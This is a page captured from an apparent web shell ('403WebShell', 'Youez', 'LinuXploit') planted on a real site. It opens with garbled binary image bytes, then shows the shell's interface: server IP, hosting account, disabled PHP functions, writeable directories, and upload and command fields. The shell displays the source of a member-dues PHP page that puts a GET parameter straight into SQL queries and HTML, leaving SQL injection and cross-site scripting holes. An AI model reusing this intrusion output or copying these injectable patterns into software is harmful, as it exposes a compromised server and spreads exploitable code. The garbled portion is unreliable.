JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.59  /  Your IP : 216.73.217.31
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/data_fin.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<?php include "header.php"; ?>
<?php include "../koneksi.php"; ?>
<?php
$view = isset($_GET['view']) ? $_GET['view'] : null;

switch($view){
	default:
	
	$npm=$_GET['npm'];
	
	
	?>

	<div class="container">
		
				<h4 align="center" class="panel-title">Invoice : <?php echo "<b> ".$npm."</b>"; ?> </h4>
			
				
				
<h4 align="center">Pembayaran Invoice </h4>

<blockquote>
  <blockquote>
    <p> <strong>Konfirmasi Pembayaran</strong></p>
    <p>  Pembayaran akan di cek dan di Validasi oleh admin:<br>
      1. Silahkan Transfer pembayaran ke Account kami.<br>
      2. Bank BCA ...<br>
      3. BANK BNI ...<br>
      4. Konfirmasi Pembayaran kepada Kami dengan cara bayar tagihan<br>  Input Jumlah pembayaran dan bukti transfers.<br>
      5. Admin akan memverifikasi dan memberikan notifikasi otomatis.
     
     
     <br> <br>
     
      <?php
        $npm=$_GET['npm'];
        $sekarang  =date("Y-m-d");
       ?>   
     
<?php
					
		$sql=mysqli_query($konek, "SELECT* FROM h_anggota WHERE npm='$npm'");
        $ds=mysqli_fetch_array($sql);
		 $iuran    = isset($ds['tgliuran']) ? $ds['tgliuran'] : null;
		 $id       = isset($ds['id_tagihan']) ? $ds['id_tagihan'] : null;
?>
<?php
if($iuran < $sekarang){
?>	
<a class='btn btn-warning btn-sm' href='pra_iur.php?npm=<?php echo $npm ?>&id=<?php echo $id ?>'>Click untuk Proses Bayar Iuran 5 Tahunan</a>

<?php
}
?>   

					<table width="" class="demo-table responsive" >
					<table class="table table-bordered table-striped">
					<table class="demo-table responsive">
					<caption class="title">Data Pembayaran Iuran</caption>
					<thead>
						<tr>
							<th scope="col">No</th>
							<th scope="col">ID</th>
							<th scope="col">Tanggal Iuran</th>
							<th scope="col">Terlambat</th>
							<th scope="col">Level</th>
                            <th scope="col">Nominal</th>
							<th scope="col">Status</th>
							<th scope="col">Action</th>
							
					
						</tr>
					</thead>
						<?php
						
						//  $sql = mysqli_query($konek, "select * from b_inv where validasi ='' AND  npm='$npm' group by id_tagihan");
						
		$sql=mysqli_query($konek, "SELECT h_anggota.*, level.tingkat, level.nominal FROM h_anggota JOIN level ON h_anggota.tingkat = level.tingkat 
		WHERE tgliuran < '$sekarang'   AND  npm='$npm'");				
						
						
						$no=1;
						$total =0;
						$bayar =0;
						$totalb =0;
						
						while($d=mysqli_fetch_array($sql)){
							 $bayartb   = number_format($d['nominal'],0,",",".");
							  $kembali  =new DateTime($d['tgliuran']);
                              $lambat   =new DateTime($sekarang);
                              $diff     =$lambat->diff($kembali);
							  $iuran    = isset($d['tgliuran']) ? $d['tgliuran'] : null;
							  $b_iuran  = isset($d['b_iuran']) ? $d['b_iuran'] : null;
							 
				?>		
					<h3>Reminder Tanggal Jatuh Tempo Iuran </h3>
                     <p>Hari ini Tanggal: <?php echo $sekarang?></p>
                     <p>Expired Tanggal: <?php echo $d['tgliuran']?></p>
      	
				<tr>
				     <td><?php echo $no?></td>
                    <td><?php echo $d['npm']?></td>
                     <td><?php echo $d['tgliuran']?></td>
                     <td><?php echo $diff->d." Hari"?></td>
                    <td><?php echo $d['tingkat']?></td>
                     <td><?php echo  $bayartb ?></td>
                      <td><?php echo $d['b_iuran']?></td>
					
   					<td  data-header='Bayar' align='center'>
							<?php		 							 
									     if($b_iuran=='proses'){
											
							echo  "<a class='btn btn-danger btn-sm' href='bayar_iur.php?npm=$npm'>Bayar tagihan</a>";
										 }else{	
							        	
											 echo "-";	
									
											}
							?>
								</td>
						</td>
		               </tr>
					<?php
								//$bayar[] = $d['bayar'];
							//$totalb[] = $d['nominal'];
						//	$bayar += $d['bayar'];
							$totalb += $d['nominal'];
						//	$npm=$d['npm'];
							//$status=$d['status'];
						//	$id=$d['id_tagihan'];
							//$iuran=$d['tgliuran'];
							//$b_iuran=$d['b_iuran'];

							//$bayar = $d['bayar'];
							
							 
							$no++;
						}
						
							//$gtjumlahnya = array_sum($jumlah);
					//	$gtjumlahnya =($jumlah);
						function rupiah($subjumlah){
						$hasil_rupiah = "Rp " . number_format($subjumlah,2,',','.');
						return $hasil_rupiah;}
						
						//$sisa = $totalb ;
					
					//Tampilkan
					
								echo "<td>";
										echo "";
										echo "<td>";

										echo "Grand Total  ";
										echo "<td>";
										echo rupiah($totalb);
										echo "<td>";
										
										
										echo "<td>";
										echo "";
										echo "<td text-align='right'>";
										
								
								    echo "</td>
						  </tr>";
					
					
					 
                }
                ?>
	  
					</table>
					<br>
					 <p>NPM: <?php echo $npm ?></p>
<table width="" class="demo-table responsive" >
<table class="table table-bordered table-striped">
<caption class="title">Data Pembayaran Iuran</caption>

<thead>
	<tr>
		<th scope="col">No</th>
        <th scope="col">No Invoice</th>
		<th scope="col">Tgl Bayar</th>
		<th scope="col">Nominal inv</th>
		<th scope="col">Bayar</th>
		<th scope="col">Periode</th>
		<th scope="col">Tgl Exp</th>
		<th scope="col">Status</th>
		<th scope="col">Catatan</th>
		<th scope="col">Bukti Transfer</th>
		
	</tr>
</thead>
				<?php
//				  $sql = mysqli_query($konek, "select * from nonspp WHERE  npm='$nis'AND status='valid' group by idnonspp");
				 $sql = mysqli_query($konek, "select * from b_inv3 where  npm='$npm'  AND SUBSTR(noinv,1,3) ='IUE' ");

				$no=1;
				$total =0;
				$bayar =0;
				$totalb =0;
				$sisa =0;
				while($d=mysqli_fetch_array($sql)){
					 $bayartb = number_format($d['bayar'],0,",",".");
					 $nominal= $d['nominal'];
					echo "<tr>
						<td data-header='No' class='title'>$no</td>
						 <td data-header='Jumlah' >$d[noinv]</td>
						<td data-header='Tgl Bayar' align='center'>";
							if($d['tgl_bayar']==''){
								echo "-";
							}else{			
								
								 echo $d['tgl_bayar'];
							}
						echo "</td>
						
					 <td data-header='Jumlah' >$d[nominal]</td>
			
						
						<td data-header='Bayar' align='center'>";
							if($d['bayar']=='0'){
								echo "-";
							}else{			
								
								 echo "Rp. $bayartb";
							}
						echo "</td>
			
						 <td data-header='Jumlah' >$d[periode] Tahun</td>	
 						<td data-header='Jumlah' >$d[tgliuran]</td>	
						
			
						<td data-header='Status bayar' align='center'>";
										if($d['validasi']==''){
								echo "-";
							}else{			
								
								 echo $d['validasi'];
							}
						echo "</td>
						
						
						
						<td data-header='Status bayar' align='center'>";
										if($d['status']=='valid'){
								echo "-";
							}else{			
								
								 echo "-";
							}
						echo "</td>
						
						<td data-header='Bukti Trans' align='center'>";
						if($d['gambar']==''){
								echo "-";
						}else{		
						echo "<img src=../files/$d[gambar] width='100' height='126'> ";
							}
						echo "</td>
						
					</tr>";
					
					$bayar+= $d['bayar'];
					//$totalb+= $d['nominal'];
					
					$npm=$d['npm'];
					$status=$d['status'];

					$id=$d['id_tagihan'];
					
					//$bayar = $d['bayar'];
					$no++;
					
					 //  $bayarnya = ($bayar);	
						//$totalnya = ($totalb);
						$sisa = $nominal-$bayar ;;
				}
				
				
			//$harga = array_sum($harga);
			
			//Tampilkan
			
						echo "<td>";
								echo "";
								echo "<td>";
								echo "<td>";
								echo "Grand Total  ";
								echo "<td>";
								
								if(isset($jumlahnya)){
								
								echo rupiah($jumlahnya);
								}
								else
								{
								echo rupiah(0);
								}
								
								echo "<td>";
								 echo "Pembayaran  ";
								 echo "<td>";
								 
								 echo rupiah($bayar) ;

								echo "<td>";
								echo "Sisa Bayar : ";
								echo "<td>";
								echo rupiah($sisa);
								
							   echo "<td>";
				//		 echo "$bayar";

						
								
			   //               echo "$sisa"; 
						echo "</td>
				  </tr>";
			
			
			
				?>	  
			</table>
			<br>
			



					       
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit